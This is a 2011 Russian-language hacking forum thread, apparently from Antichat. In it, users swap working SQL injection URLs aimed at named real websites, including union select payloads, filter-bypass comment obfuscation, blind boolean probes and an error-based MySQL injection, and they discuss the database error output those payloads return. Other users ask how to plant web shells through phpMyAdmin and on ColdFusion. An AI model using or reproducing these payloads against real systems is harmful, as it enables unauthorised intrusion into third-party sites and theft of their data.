11.03.2011, 17:12
|
|
Познающий
Регистрация: 19.02.2011
Сообщений: 32
С нами:
8014646
Репутация:
-3
|
|
http://www.hawkingtech.com/products/index.php?CatID=-32+union+select+1,2,3,4,5,6,7,8,9,10,11,12+--+
идет фильтрация кавычек...
как можно обойти?
заранее спс
и вот еще интересная
http://www.mibf.ru/index.php?id=99999/**//*!union*//**//*!select*/1,2,3,4,5,6,7,8,9,10/*
|
|
|
11.03.2011, 17:45
|
|
Новичок
Регистрация: 13.04.2010
Сообщений: 0
С нами:
8462565
Репутация:
0
|
|
как залить шелл если имеется доступ только к pma? права root
|
|
|
|
11.03.2011, 18:57
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Сообщение от foozzi
как залить шелл если имеется доступ только к pma? права root
/thread133925-phpmyadmin+shell.html
|
|
|
|
11.03.2011, 20:18
|
|
Участник форума
Регистрация: 27.08.2010
Сообщений: 154
С нами:
8268086
Репутация:
7
|
|
Сообщение от asql
http://www.hawkingtech.com/products/index.php?CatID=-32+union+select+1,2,3,4,5,6,7,8,9,10,11,12+--+
идет фильтрация кавычек...
как можно обойти?
заранее спс
а кавычки тут и не нужны, параметр-то числовой
почему не работает юнион:
http://www.hawkingtech.com/products/index.php?CatID=32+and+substring(version(),1,1)=3 true
Сообщение от asql
и вот еще интересная
http://www.mibf.ru/index.php?id=99999/**//*!union*//**//*!select*/1,2,3,4,5,6,7,8,9,10/*
помимо гета есть еще и пост
|
|
|
|
11.03.2011, 20:29
|
|
Познающий
Регистрация: 19.02.2011
Сообщений: 32
С нами:
8014646
Репутация:
-3
|
|
Сообщение от None
почему не работает юнион:
http://www.hawkingtech.com/products/index.php?CatID=32+and+substring(version(),1,1)=3 true
не катит, выдает
Can't execute query SELECT * FROM families WHERE CatID=32 and substring(version(),1,1)=3 true AND date_archived IS NULL ORDER BY orderval
Error: You have an error in your SQL syntax near 'true AND date_archived IS NULL ORDER BY orderval' at line 1
может я что то не так делаю... хз..
|
|
|
|
11.03.2011, 20:46
|
|
Участник форума
Регистрация: 27.08.2010
Сообщений: 154
С нами:
8268086
Репутация:
7
|
|
Сообщение от Moriarty
Сообщение от freezed
почему не работает юнион:
Может потому, что его не было в 3 ветке?! =\
" if author else f"
Moriarty said:
Сообщение от freezed
почему не работает юнион:
Может потому, что его не было в 3 ветке?! =\ а где ты там вопрос увидел?
|
|
|
|
11.03.2011, 21:09
|
|
Познающий
Регистрация: 19.02.2011
Сообщений: 32
С нами:
8014646
Репутация:
-3
|
|
Сообщение от Moriarty
Не загоняй! true к запросу не относится! Это означает что мускул 3ей ветки!
Может потому, что его не было в 3 ветке?! =\
ввожу
http://www.hawkingtech.com/products/index.php?CatID=32+and+substring(version(),1,1)=3
выдает норм страницу...
Вы строго не судите меня, я новичок в этом святом деле=)
и если можно , то прошу объяснить принцып действия тут вот этого
Сообщение от None
substring(version(),1,1)=3
именно подбор полей как происходит? типа этого?
Сообщение от None
substring(1)=1
substring(1,2)=2
substring(1,2,3)=3
или дайте линк...
|
|
|
|
11.03.2011, 21:27
|
|
Постоянный
Регистрация: 17.09.2009
Сообщений: 775
С нами:
8762549
Репутация:
1069
|
|
Сообщение от asql
ввожу
http://www.hawkingtech.com/products/index.php?CatID=32+and+substring(version(),1,1)=3
выдает норм страницу...
Вы строго не судите меня, я новичок в этом святом деле=)
и если можно , то прошу объяснить принцып действия тут вот этого
именно подбор полей как происходит? типа этого?
или дайте линк...
/thread18552-blind+sql.html - вот это
https://rdot.org/forum/showthread.php?t=245 - потом это
https://rdot.org/forum/showthread.php?t=503 - и напоследок
согласно 3 ссылке и описанному там методу MySQL 3 error based inj, раскручивать её можно через вывод в ошибке, т.е (лишние пробелы, вставляемые форумом, убрать)
Код:
http://www.hawkingtech.com/products/index.php?CatID=32+or+1+group+by+concat(version(),floor(rand(0)*2))+having+min(0)+or+1+--+
|
|
|
|
11.03.2011, 22:12
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами:
8803961
Репутация:
8
|
|
Интересует полноценный шелл на Macromedia ColdFusion.
|
|
|
|
11.03.2011, 22:32
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от FlaktW
Интересует полноценный шелл на Macromedia ColdFusion.
/thread239916.html
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
